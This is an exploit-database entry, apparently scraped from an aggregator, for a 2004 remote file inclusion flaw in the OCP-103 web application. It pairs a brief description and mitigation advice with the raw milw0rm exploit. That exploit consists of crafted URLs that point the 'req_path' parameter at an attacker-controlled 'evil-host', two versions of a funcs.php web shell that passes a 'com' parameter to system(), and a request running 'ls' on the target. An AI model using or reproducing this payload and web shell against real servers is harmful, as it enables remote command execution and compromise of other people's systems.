header-logo
Suggest Exploit
vendor:
OCP-103
by:
Unknown
7.5
CVSS
HIGH
Command Execution
78
CWE
Product Name: OCP-103
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2004

Command Execution Vulnerability in OCP-103

The OCP-103 application is vulnerable to command execution due to improper handling of user input. By manipulating the 'req_path' parameter and injecting malicious code through the 'funcs.php' script on an evil host, an attacker can execute arbitrary commands on the target system. The provided example demonstrates how to execute the 'ls' command on the target system.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize and validate user input before using it in system commands. Additionally, the application should implement proper access controls to restrict unauthorized access to the 'req_path' parameter.
Source

Exploit-DB raw data:

http://localhost/ocp-103/index.php?req_path=http ://evil-host/



On your evil host you must put scipt funcs.php.

Example of funcs.php if your host doesn't support php.



   <?php

     $com = $_GET["com"];

     system ("$com");

   ?>



  Example of funcs.php if your host support php.



   <?php

     echo '<?php $com = $_GET["com"]; system ("$com"); ?>';

   ?>



  http://localhost/ocp-103/index.php?req_path=http://evil-host/&com=ls


# milw0rm.com [2004-10-13]

Navigation

Suggest Exploit

Services By CQR